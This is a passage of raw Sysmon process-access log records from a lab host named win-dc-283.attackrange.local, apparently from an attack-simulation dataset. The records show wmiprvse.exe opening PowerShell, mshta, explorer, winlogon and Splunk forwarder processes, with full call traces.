15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 